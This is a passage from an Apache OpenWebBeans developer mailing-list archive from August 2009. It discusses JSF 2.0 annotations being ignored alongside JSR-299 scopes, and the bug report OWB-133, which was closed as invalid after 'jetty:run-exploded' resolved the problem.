> Matthias Wessendorf >> > >> > blog: http://matthiaswessendorf.wordpress.com/ >> > sessions: http://www.slideshare.net/mwessendorf >> > twitter: http://twitter.com/mwessendorf >> > >> >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:55:06 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92786 invoked from network); 26 Aug 2009 15:55:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:55:06 -0000 Received: (qmail 40920 invoked by uid 500); 26 Aug 2009 15:55:04 -0000 Delivered-To: [email protected] Received: (qmail 40594 invoked by uid 500); 26 Aug 2009 15:55:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40503 invoked by uid 99); 26 Aug 2009 15:55:03 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:55:03 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:53:03 +0000 Received: by ey-out-1920.google.com with SMTP id 5so63327eyb.8 for <[email protected]>; Wed, 26 Aug 2009 08:52:41 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; bh=XolUAn4rnXfdFE2OvnKxR8SX84f3L2EdSv4ztJLhfK4=; b=tRX2b8Qir9cFfr9yMjY7e0AnvpQHCjOjfFrRP284WsRQGugPIRiupJVvWRIQFQfxZA VHsEcZMZnsbTM+1EandYf5coa9uHmP1xIBhY7w8n7ZO9KcxL954cBGKGaSRb9y2J0uaT O6BTsrRPif7dF3VlkabO67l4PEitLJiNCIsRA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type:content-transfer-encoding; b=NSwMQvIOOCahaFK2da4Vp+zkvjmq5Jo9dgd7O/ByvbdZNMCSV53/rW5oIC97O5+Odm GJOCpARPfJLI2+Pq715KGhdI7fnLseCDbUQzbwJXwxYwS3cuLAlZrj8cBCgb2e9Qz8Dm FJz57i4H28oIikCwQWlM90/xpQp8JfCs4NMjE= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id p17mr2078207ebd.6.1251301961449; Wed, 26 Aug 2009 08:52:41 -0700 (PDT) Date: Wed, 26 Aug 2009 17:52:41 +0200 X-Google-Sender-Auth: 82f3fd7557f9539c Message-ID: <[email protected]> Subject: Servlet 3.0 ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hello, as WebBeans spec is kinda late - so is Servlet 3.0 - I was wondering if you guys could leverage some of their stuff, like the @Filter annotation or the "web-xml fragments" stuff ? (e.g. for WebBeansJSFFilter), for the -jsf module ? Thx, Matthias -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:58:15 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94238 invoked from network); 26 Aug 2009 15:58:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:58:15 -0000 Received: (qmail 46285 invoked by uid 500); 26 Aug 2009 15:58:15 -0000 Delivered-To: [email protected] Received: (qmail 46261 invoked by uid 500); 26 Aug 2009 15:58:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46251 invoked by uid 99); 26 Aug 2009 15:58:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:58:15 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:58:03 +0000 Received: by ewy11 with SMTP id 11so301219ewy.35 for <[email protected]>; Wed, 26 Aug 2009 08:57:42 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=MB77iYU2QRyxzxOnDJv6GRTA2d9/SIVPgovM0b0Mf9E=; b=RnRe5KHDWCrXUtp2CTDRo9fOYLeHPgGhQD4YZPQByPp+bOYE0uEOPiMNl0Yy4jyecM AJBY9XMgNjhwD9URrdriHD+X2KqmbTm3j16OBQyshMYLLAkXJGIvjQB0JTfM9CQwsryb 4Ts93JPehcXlHFtWOU/9OqAzWT+eXqa7pUHdY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=GG95XxYYGtiOyyiSwau2JGal7M+js/l81o8KRK1lMMIUYQdhwGyQ39DBkCZylkq/UG DxYZY+X5grTMi3qRkY6v8XYCT2HCaFtxUEY0CoRoxCc1Ap3D5O0KuN11k3mMyoWul5CZ 2tJjjzRPntRgoRXAone82PVohI4A1/3oGBNz0= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id a4mr8319735eba.37.1251302260871; Wed, 26 Aug 2009 08:57:40 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 17:57:40 +0200 X-Google-Sender-Auth: 77b0b4b7e9051f2b Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org mvn jetty:run-exploded fixes that. I guess that's JSF's problem (I am currently using the RI) Oh boy! :) On Wed, Aug 26, 2009 at 5:45 PM, Matthias Wessendorf<[email protected]> wro= te: > On Wed, Aug 26, 2009 at 5:39 PM, Mark Struberg<[email protected]> wrote: >> In fact we (OWB) should provide standard context implementations for JSF= annotated scopes. >> >> The whole picture: >> >> .) =A0JSF scanns the classpath for JSF annotations >> >> .) OWB scanns the classpath for JSR-299 annotations >> >> In fact, I assume (not having looked at the code) that MyFaces provides = kind of a mini DI container in the EL code. So any EL which will get throug= h to the faces EL handler will successfully resolve those scoped beans >> >> Otoh, OWB also provides an EL handler which is dominant (prior in the EL= chain). OWB currently simply ignores the javax.faces.scope annotations sin= ce they are 'unknown' for OWB. So this very class will look like a bean whi= ch has no [email protected]. >> >> >> The problem arises latest if JSF scoped beans need to be injected into J= SR-299 beans and vice versa... >> >> an idea how to resolve this: >> We need to provide context implementations for the faces scopes in the w= ebbeans-jsf module and let OWB do all the resolving. >> >> wdyt? > > yes, that's true. It is really a PITA to have three different ways to > @inject stuff (in JavaEE - well the javax.faces.bean.** stuff is > optional) > > I am pretty sure this will actually cause lot's of pain, trouble and > bad blogs on JavaEE 6 (heck, deserved! :-) ) > > Are you able to bring this dilemma up on some EG ? > (mismatch of all the stuff) > > -Matthias > >> >> LieGrue, >> strub >> >> >> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: >> >>> From: Matthias Wessendorf <[email protected]> >>> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >>> To: [email protected] >>> Date: Wednesday, August 26, 2009, 5:26 PM >>> On Wed, Aug 26, 2009 at 5:23 PM, >>> Matthias Wessendorf<[email protected]> >>> wrote: >>> > On Wed, Aug 26, 2009 at 5:17 PM, Mark Struberg<[email protected]> >>> wrote: >>> >> for what I know (discussion on wb-dev) JSF apps >>> should use JSR-299 @ScopeType annotated scopes (renamed to >>> @NormalScope in the latest spec) and not faces scopes. I did >>> hope that we could unify all scopes by generally using >>> JSR-330 javax.inject.Scope in all EE fields. But that will >>> not work until JSR-299 also recognizes and treats JSR-330 >>> scopes as normal scopes. >>> >> >>> > >>> > WTF ? :) >>> > >>> > It is kinda odd that JSF 2.0 has should use the 299 >>> stuff. Standalone, >>> > ok all fine (not tested). >>> > But even if there are both in the game jsf2.0 and 299, >>> they should >>> > just work (or at least I should >>> > get a warning that the bean is using a (good) -sorry- >>> incorrect... annotation. >>> > >>> > Basically this is a total mess. Annontations work >>> standalone, but not >>> > when adding some heavyweight >>> > stuff (like 299) to the game ? Oh boy... >>> >>> I am pretty sure that this will introcude a lot of fun to >>> folks >>> writing JSF 2.0 applications, >>> if your statement is true. That would worse than the JSP >>> 2.1 >>> dependency (with JSF 1.2) >>> >>> I filed this bug: >>> https://issues.apache.org/jira/browse/OWB-133 >>> >>> At least there should be some help. Not everybody is >>> thrilled to >>> replace annotations based on >>> the environment (at least not me) >>> >>> > >>> > -Matthias >>> > >>> >> LieGrue, >>> >> strub >>> >> >>> >> >>> >> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> >>> wrote: >>> >> >>> >>> From: Matthias Wessendorf <[email protected]> >>> >>> Subject: Re: WebBeans "eating" JSF 2.0 >>> annotations ? >>> >>> To: [email protected] >>> >>> Date: Wednesday, August 26, 2009, 5:11 PM >>> >>> has no effect. The beast can't find >>> >>> the JSF beans. >>> >>> Due to lack of time, I am going with JSF 2.0 >>> standalone. >>> >>> >>> >>> Question is: as it was working the current >>> behavior is a >>> >>> regression, >>> >>> has there been any testing on OBW + JSF 2.0 ? >>> >>> >>> >>> -Matthias >>> >>> >>> >>> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan >>> Erdogdu<[email protected]> >>> >>> wrote: >>> >>> > It must not eat. >>> >>> > >>> >>> > But one point, >>> >>> > >>> >>> > You still use old XML configuration file >>> format. As a >>> >>> default OWB uses new >>> >>> > XML format. Add >>> >>> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/sam= ples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >>> >>> > >>> >>> > in your project >>> resources/META-INF/openwebbeans folder >>> >>> and sure that all >>> >>> > libraries are ok. >>> >>> > >>> >>> > You can look necessary libs from >>> guess.war . You can >>> >>> create it from mvn >>> >>> > package -Pjetty. >>> >>> > >>> >>> > --Gurkan >>> >>> > >>> >>> > >>> >>> > 2009/8/26 Matthias Wessendorf <[email protected]> >>> >>> > >>> >>> >> Hi, >>> >>> >> >>> >>> >> is it possible that the current trunk >>> is _eating_ >>> >>> JSF 2.0 annotations ? >>> >>> >> >>> >>> >> <someCode> >>> >>> >> ... >>> >>> >> import javax.faces.bean.ManagedBean; >>> >>> >> import >>> javax.faces.bean.SessionScoped; >>> >>> >> >>> >>> >> @ManagedBean(name=3D"playersBean") >>> >>> >> @SessionScoped >>> >>> >> public class ViewParamsBean >>> >>> >> { >>> >>> >> ... >>> >>> >> </someCode> >>> >>> >> >>> >>> >> In June (before reflecting the >>> >>> javax.enterprise.context changes) it was >>> >>> >> working. >>> >>> >> Now expressions like #{playersBean} >>> are simply >>> >>> ignored ;-) >>> >>> >> >>> >>> >> Demo project is here: >>> >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >>> >>> >> >>> >>> >> -Matthias >>> >>> >> >>> >>> >> >>> >>> >> -- >>> >>> >> Matthias Wessendorf >>> >>> >> >>> >>> >> blog: http://matthiaswessendorf.wordpress.com/ >>> >>> >> sessions: http://www.slideshare.net/mwessendorf >>> >>> >> twitter: http://twitter.com/mwessendorf >>> >>> >> >>> >>> > >>> >>> > >>> >>> > >>> >>> > -- >>> >>> > Gurkan Erdogdu >>> >>> > http://gurkanerdogdu.blogspot.com >>> >>> > >>> >>> >>> >>> >>> >>> >>> >>> -- >>> >>> Matthias Wessendorf >>> >>> >>> >>> blog: http://matthiaswessendorf.wordpress.com/ >>> >>> sessions: http://www.slideshare.net/mwessendorf >>> >>> twitter: http://twitter.com/mwessendorf >>> >>> >>> >> >>> >> >>> >> >>> >> >>> > >>> > >>> > >>> > -- >>> > Matthias Wessendorf >>> > >>> > blog: http://matthiaswessendorf.wordpress.com/ >>> > sessions: http://www.slideshare.net/mwessendorf >>> > twitter: http://twitter.com/mwessendorf >>> > >>> >>> >>> >>> -- >>> Matthias Wessendorf >>> >>> blog: http://matthiaswessendorf.wordpress.com/ >>> sessions: http://www.slideshare.net/mwessendorf >>> twitter: http://twitter.com/mwessendorf >>> >> >> >> >> > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 16:02:51 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95774 invoked from network); 26 Aug 2009 16:02:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:02:51 -0000 Received: (qmail 49413 invoked by uid 500); 26 Aug 2009 16:02:51 -0000 Delivered-To: [email protected] Received: (qmail 49382 invoked by uid 500); 26 Aug 2009 16:02:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49372 invoked by uid 99); 26 Aug 2009 16:02:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:02:51 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:02:40 +0000 Received: by ewy4 with SMTP id 4so322530ewy.27 for <[email protected]>; Wed, 26 Aug 2009 09:02:19 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=4Ar/nKvFaaPB83w0NeX7KXH8aLJRO/3Vq8tRbCCRQuA=; b=K9Sk1LU5JfbrvH+cfCoCt8p1GfZsJnUIYCyfEJJX91tevVMXc4pCPsugkJNaEemWID sKbzoVIjQor5X1cbuE0wSvREzSnuCMvF0c+rZBQEDUvxgyJuSzcXF9Ti8qK9sj4+lOei nxSavF1UJ50sz+Q1BvnObEiaF8sFkSMapuZ2g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=u6sQY3dCk35izdSaXw0fJhF0BlW56ZcM4E8394O8SMxGbBRobbMOKI7+RDbEY/1QG9 htLIU9C259XjMK/QxIBa3D45mAQOIJP/2QRtvu/5hnYmi8za9R0LKgz2DRhD+cThfMRy TxjzJcSsbJUPlS2pEx9n073DqFJKkigznAfWQ= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id f20mr5402062eba.62.1251302538448; Wed, 26 Aug 2009 09:02:18 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 18:02:18 +0200 X-Google-Sender-Auth: 33b6fcf4c951f54b Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org I closed the ticket :-) On Wed, Aug 26, 2009 at 5:57 PM, Matthias Wessendorf<[email protected]> wro= te: > mvn jetty:run-exploded fixes that. I guess that's JSF's problem (I am > currently using the RI) > > Oh boy! :) > > On Wed, Aug 26, 2009 at 5:45 PM, Matthias Wessendorf<[email protected]> w= rote: >> On Wed, Aug 26, 2009 at 5:39 PM, Mark Struberg<[email protected]> wrote: >>> In fact we (OWB) should provide standard context implementations for JS= F annotated scopes. >>> >>> The whole picture: >>> >>> .) =A0JSF scanns the classpath for JSF annotations >>> >>> .) OWB scanns the classpath for JSR-299 annotations >>> >>> In fact, I assume (not having looked at the code) that MyFaces provides= kind of a mini DI container in the EL code. So any EL which will get throu= gh to the faces EL handler will successfully resolve those scoped beans >>> >>> Otoh, OWB also provides an EL handler which is dominant (prior in the E= L chain). OWB currently simply ignores the javax.faces.scope annotations si= nce they are 'unknown' for OWB. So this very class will look like a bean wh= ich has no [email protected]. >>> >>> >>> The problem arises latest if JSF scoped beans need to be injected into = JSR-299 beans and vice versa... >>> >>> an idea how to resolve this: >>> We need to provide context implementations for the faces scopes in the = webbeans-jsf module and let OWB do all the resolving. >>> >>> wdyt? >> >> yes, that's true. It is really a PITA to have three different ways to >> @inject stuff (in JavaEE - well the javax.faces.bean.** stuff is >> optional) >> >> I am pretty sure this will actually cause lot's of pain, trouble and >> bad blogs on JavaEE 6 (heck, deserved! :-) ) >> >> Are you able to bring this dilemma up on some EG ? >> (mismatch of all the stuff) >> >> -Matthias >> >>> >>> LieGrue, >>> strub >>> >>> >>> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: >>> >>>> From: Matthias Wessendorf <[email protected]> >>>> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >>>> To: [email protected] >>>> Date: Wednesday, August 26, 2009, 5:26 PM >>>> On Wed, Aug 26, 2009 at 5:23 PM, >>>> Matthias Wessendorf<[email protected]> >>>> wrote: >>>> > On Wed, Aug 26, 2009 at 5:17 PM, Mark Struberg<[email protected]> >>>> wrote: >>>> >> for what I know (discussion on wb-dev) JSF apps >>>> should use JSR-299 @ScopeType annotated scopes (renamed to >>>> @NormalScope in the latest spec) and not faces scopes. I did >>>> hope that we could unify all scopes by generally using >>>> JSR-330 javax.inject.Scope in all EE fields. But that will >>>> not work until JSR-299 also recognizes and treats JSR-330 >>>> scopes as normal scopes. >>>> >> >>>> > >>>> > WTF ? :) >>>> > >>>> > It is kinda odd that JSF 2.0 has should use the 299 >>>> stuff. Standalone, >>>> > ok all fine (not tested). >>>> > But even if there are both in the game jsf2.0 and 299, >>>> they should >>>> > just work (or at least I should >>>> > get a warning that the bean is using a (good) -sorry- >>>> incorrect... annotation. >>>> > >>>> > Basically this is a total mess. Annontations work >>>> standalone, but not >>>> > when adding some heavyweight >>>> > stuff (like 299) to the game ? Oh boy... >>>> >>>> I am pretty sure that this will introcude a lot of fun to >>>> folks >>>> writing JSF 2.0 applications, >>>> if your statement is true. That would worse than the JSP >>>> 2.1 >>>> dependency (with JSF 1.2) >>>> >>>> I filed this bug: >>>> https://issues.apache.org/jira/browse/OWB-133 >>>> >>>> At least there should be some help. Not everybody is >>>> thrilled to >>>> replace annotations based on >>>> the environment (at least not me) >>>> >>>> > >>>> > -Matthias >>>> > >>>> >> LieGrue, >>>> >> strub >>>> >> >>>> >> >>>> >> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> >>>> wrote: >>>> >> >>>> >>> From: Matthias Wessendorf <[email protected]> >>>> >>> Subject: Re: WebBeans "eating" JSF 2.0 >>>> annotations ? >>>> >>> To: [email protected] >>>> >>> Date: Wednesday, August 26, 2009, 5:11 PM >>>> >>> has no effect. The beast can't find >>>> >>> the JSF beans. >>>> >>> Due to lack of time, I am going with JSF 2.0 >>>> standalone. >>>> >>> >>>> >>> Question is: as it was working the current >>>> behavior is a >>>> >>> regression, >>>> >>> has there been any testing on OBW + JSF 2.0 ? >>>> >>> >>>> >>> -Matthias >>>> >>> >>>> >>> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan >>>> Erdogdu<[email protected]> >>>> >>> wrote: >>>> >>> > It must not eat. >>>> >>> > >>>> >>> > But one point, >>>> >>> > >>>> >>> > You still use old XML configuration file >>>> format. As a >>>> >>> default OWB uses new >>>> >>> > XML format. Add >>>> >>> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/sa= mples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.propertie= s >>>> >>> > >>>> >>> > in your project >>>> resources/META-INF/openwebbeans folder >>>> >>> and sure that all >>>> >>> > libraries are ok. >>>> >>> > >>>> >>> > You can look necessary libs from >>>> guess.war . You can >>>> >>> create it from mvn >>>> >>> > package -Pjetty. >>>> >>> > >>>> >>> > --Gurkan >>>> >>> > >>>> >>> > >>>> >>> > 2009/8/26 Matthias Wessendorf <[email protected]> >>>> >>> > >>>> >>> >> Hi, >>>> >>> >> >>>> >>> >> is it possible that the current trunk >>>> is _eating_ >>>> >>> JSF 2.0 annotations ? >>>> >>> >> >>>> >>> >> <someCode> >>>> >>> >> ... >>>> >>> >> import javax.faces.bean.ManagedBean; >>>> >>> >> import >>>> javax.faces.bean.SessionScoped; >>>> >>> >> >>>> >>> >> @ManagedBean(name=3D"playersBean") >>>> >>> >> @SessionScoped >>>> >>> >> public class ViewParamsBean >>>> >>> >> { >>>> >>> >> ... >>>> >>> >> </someCode> >>>> >>> >> >>>> >>> >> In June (before reflecting the >>>> >>> javax.enterprise.context changes) it was >>>> >>> >> working. >>>> >>> >> Now expressions like #{playersBean} >>>> are simply >>>> >>> ignored ;-) >>>> >>> >> >>>> >>> >> Demo project is here: >>>> >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >>>> >>> >> >>>> >>> >> -Matthias >>>> >>> >> >>>> >>> >> >>>> >>> >> -- >>>> >>> >> Matthias Wessendorf >>>> >>> >> >>>> >>> >> blog: http://matthiaswessendorf.wordpress.com/ >>>> >>> >> sessions: http://www.slideshare.net/mwessendorf >>>> >>> >> twitter: http://twitter.com/mwessendorf >>>> >>> >> >>>> >>> > >>>> >>> > >>>> >>> > >>>> >>> > -- >>>> >>> > Gurkan Erdogdu >>>> >>> > http://gurkanerdogdu.blogspot.com >>>> >>> > >>>> >>> >>>> >>> >>>> >>> >>>> >>> -- >>>> >>> Matthias Wessendorf >>>> >>> >>>> >>> blog: http://matthiaswessendorf.wordpress.com/ >>>> >>> sessions: http://www.slideshare.net/mwessendorf >>>> >>> twitter: http://twitter.com/mwessendorf >>>> >>> >>>> >> >>>> >> >>>> >> >>>> >> >>>> > >>>> > >>>> > >>>> > -- >>>> > Matthias Wessendorf >>>> > >>>> > blog: http://matthiaswessendorf.wordpress.com/ >>>> > sessions: http://www.slideshare.net/mwessendorf >>>> > twitter: http://twitter.com/mwessendorf >>>> > >>>> >>>> >>>> >>>> -- >>>> Matthias Wessendorf >>>> >>>> blog: http://matthiaswessendorf.wordpress.com/ >>>> sessions: http://www.slideshare.net/mwessendorf >>>> twitter: http://twitter.com/mwessendorf >>>> >>> >>> >>> >>> >> >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 16:04:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96348 invoked from network); 26 Aug 2009 16:04:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:04:31 -0000 Received: (qmail 51398 invoked by uid 500); 26 Aug 2009 16:04:31 -0000 Delivered-To: [email protected] Received: (qmail 51380 invoked by uid 500); 26 Aug 2009 16:04:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51370 invoked by uid 99); 26 Aug 2009 16:04:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:04:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:04:20 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4B5CB234C044 for <[email protected]>; Wed, 26 Aug 2009 09:03:59 -0700 (PDT) Message-ID: <1015221170.1251302639293.JavaMail.jira@brutus> Date: Wed, 26 Aug 2009 09:03:59 -0700 (PDT) From: =?utf-8?Q?Matthias_We=C3=9Fendorf_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Resolved: (OWB-133) OWB ignores the JSF 2.0 annotions In-Reply-To: <287242674.1251300119347.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-133?page=3Dcom.atlassian.j= ira.plugin.system.issuetabpanels:all-tabpanel ] Matthias We=C3=9Fendorf resolved OWB-133. ------------------------------------ Resolution: Invalid running jetty:run-exploded "fixes" that. Looks like the JSF 2.0 RI is not able to scan annotations in normal (develo= per-friendly) jetty:run mode sorry for the noise > OWB ignores the JSF 2.0 annotions=20 > ---------------------------------- > > Key: OWB-133 > URL: https://issues.apache.org/jira/browse/OWB-133 > Project: OpenWebBeans > Issue Type: Bug > Components: Injection and Lookup > Reporter: Matthias We=C3=9Fendorf > Assignee: Gurkan Erdogdu > Priority: Critical > > using Managed Beans with JSF 2.0 annotations has no effect, as OWB simply= ignores them > See demo project (test-case) here: > https://facesgoodies.googlecode.com/svn/CGN/trunk/ > replacing the JSF annotations by javax.enterprise.** fixes that. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Aug 26 16:06:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96959 invoked from network); 26 Aug 2009 16:06:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:06:18 -0000 Received: (qmail 55060 invoked by uid 500); 26 Aug 2009 16:06:18 -0000 Delivered-To: [email protected] Received: (qmail 55037 invoked by uid 500); 26 Aug 2009 16:06:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55027 invoked by uid 99); 26 Aug 2009 16:06:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:06:17 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27804.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 26 Aug 2009 16:06:05 +0000 Received: (qmail 15076 invoked by uid 60001); 26 Aug 2009 16:05:43 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1251302743; bh=uOHmNQ36nJmcqp3iuHjNoR5vC2tNwHfuAVhvJ+Ru5IY=; 